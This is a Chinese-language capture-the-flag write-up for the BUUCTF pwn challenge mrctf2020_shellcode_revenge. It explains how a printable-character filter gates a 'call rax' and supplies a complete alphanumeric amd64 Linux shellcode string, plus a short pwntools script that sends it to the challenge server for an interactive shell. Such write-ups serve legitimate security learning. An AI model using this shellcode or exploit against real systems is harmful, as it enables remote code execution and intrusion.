[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可見字符shellcode)

檢查了下保護(hù)發(fā)現(xiàn)NX 沒有開，肯定要自己寫shellcode呀。
不過這道題，刷新了我的認(rèn)知。眾所周知，手寫的shellcode里面肯定有很多不可見字符。第一次碰到可見的shellcode。

看下IDA, 不能反匯編不過問題不大,沒事.
個(gè)人建議,看匯編的時(shí)候,建議看流程圖,更加直觀

將shellcode寫入,那個(gè)buf
不過下面肯定大于0呀.rbp + var_8是我們輸入字符串的長度.發(fā)生轉(zhuǎn)跳

箭頭的地方我們不希望發(fā)送轉(zhuǎn)跳,這樣我們就可以直接call rax了.rax指向的就是我們的buf.
但是eax為0, rbp + var_8是我們輸入字符串的長度.肯定發(fā)送轉(zhuǎn)跳

幸好接下來, 可以再次轉(zhuǎn)跳回來,不過要求就是每個(gè)字符的ascii碼 ,必須大于0x60, 小于0x7a或者一堆, 自己可以慢慢看.
總結(jié)就是可見字符可以重新轉(zhuǎn)跳,并且eax會(huì)+ 1, 當(dāng)所有的shellcode為可見字符時(shí), 上面就不會(huì)發(fā)生轉(zhuǎn)跳我們就可以執(zhí)行call rax.
也就是我們的shellcode了

peak小知識(shí)

函數(shù)返回值,一般都會(huì)放在eax寄存器里面.

amd64, linux可見字符shellcode 為'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

exploit

from pwn import * p = remote("node3.buuoj.cn",28153) payload = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t' p.send(payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。